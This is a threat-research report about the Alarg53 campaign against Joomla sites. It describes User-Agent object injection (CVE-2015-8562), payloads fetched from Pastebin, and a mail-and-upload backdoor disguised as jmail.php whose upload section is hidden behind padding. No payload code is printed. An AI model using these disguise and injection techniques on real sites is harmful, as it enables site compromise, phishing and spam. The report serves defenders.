March 5, 2019
Research By: Asaf G. and Adi I.
Joomla! is one of the most popular CMS platforms and is used by hundreds of thousands of organizations worldwide. Over the years, many vulnerabilities were found in the product, such as Joomla Core Sterilizer Cross-Site Scripting Filter Privilege Escalation (CVE-2017-7985) and Joomla Object Injection Remote Command Execution (CVE-2015-8562). Indeed, over the past two years, there is evidence of a significant surge in the number of Joomla known vulnerabilities.
More recently though, Check Point Research has come across a new campaign from a known threat actor who is now exploiting a new backdoor with an old vulnerability in Joomla! and is using it to monetize his attack.
Fig 1: Joomla Vulnerabilities over the years
Jmail is Joomla’s mail service, enabling the user to send mail through the platform. Although intended to send emails, as with any PHP, when it lacks the proper security mechanisms it can be manipulated to be used for phishing, spam and even implement a backdoor infrastructure within the platform. Indeed, by implementing simple manipulations on the User-Agent header on HTTP requests, one can manipulate the platform and override the existing Jmail service.
The threat actor, Alarg53, is certainly aware of this and is currently exploiting it to carry out a profitable spam campaign. But this is not the first time Alarg53 is embarking on such a venture. Two years ago he gained worldwide attention by hacking Stanford University servers via a WordPress vulnerability for similar purposes. Whereas Alarg53 is a known hacker that has managed to hack more than 15,000+ sites, this time he has hit the big time as his attacks have evolved to a include a significant and high-scale backdoor and phishing infrastructure.
The Attack Flow
- Exploiting Joomla Object Injection Remote Command Execution
First, the attacker uses an old and known object injection Remote Code execution (RCE), in which code is injected to the User-Agent header field in HTTP requests. In our case, the attacker injects base64 string in the User-Agent field.
Fig 2: The base64 decoded PHP code
The PHP code then downloads the files and stores them in a specific path.
Once decoded, it is transformed into PHP code that runs on the victim’s machine. The code tries to download specific files from Pastebin and stores them in a designated path. In one of the downloads attempts, we noticed that the designated path is “./libraries/joomla/jmail.php”, which was found to be very interesting.
It’s worth mentioning that the URLs to some of the files were dead when discovered.
Overriding Joomla’s Jmail service
The interesting file was apparently an HTML file containing PHP code as well. The file contained two major sections that serve two functionalities – Sending mail and uploading files. The chosen file name and the general location of the file in Joomla’s libraries folder is chosen to let administrators think that the backdoor is actually a legitimate Joomla core file.
Fig 3: The mail section in the file
Fig 4: The upload section in the file
In order to disguise the uploading feature, the attacker uses many BR tags and puts the relevant by the end of the file
Significant backdoor and phishing infrastructure
From now on, this file is actually an infrastructure in which the attacker can upload files and send mail for his own purposes. Based on our threat actor’s activity on the web, it seems this infrastructure is being used for phishing and mail spamming.
Fig 5: An example of a phishing page made by the attacker
Who’s Behind the Attack?
Based on several indicators, the threat actor behind the scenes is an Egyptian defacement hacker referred as Alarg53. Over the past few years, Alarg53 has managed to hack more than 15,000 websites and replacing their home page with a sign of “Hacked by Alarg53” instead. Since then, and over the last few years, Alarg has not only tried to hack websites but has also tried to establish a phishing and spamming infrastructure. Two years ago, Alarag53 gained worldwide attention by attacking The Biology of Aging Center at Stanford University’s website. At first, it was thought to be just another “Hacked By Alarg53” attack, but within a few hours, two PHP files were uploaded to the relevant servers enabling them to send large amounts of spam mail.
Fig 6: An example of a “Hacked By Alarg53” home page
At first, Alarg53 was primarily a hacktivist, hacking sites in order to support his ideology, as well as for the pure challenge of hacking. Recently, though, he started to monetize his activities through crypto mining attacks and the phishing infrastructure.
His attacks have affected many countries in the world, from the US and Mexico, Portugal, the UK, France, India and Japan. Many industries were also affected including Finance, Banking and Government.
Fig 7: A map showing Alarg53 activities
Jmail Breaker is a significant backdoor and phishing infrastructure established by a known hacker with a strong record. Using an old Joomla Object Injection vulnerability, the attacker has managed to create an interesting chain that eventually can be leveraged for monetization through a phishing and spamming infrastructure. We predict that we will soon see evidence of such spamming methodologies in the near future.
SandBlast Network Protection
Check Point customers are protected by the below IPS protection:
- Joomla Object Injection Remote Command Execution (CVE-2015-8562)
- Joomla JmailBreaker PHP Web Shell Backdoor
- Joomla JmailBreaker Arbitrary file upload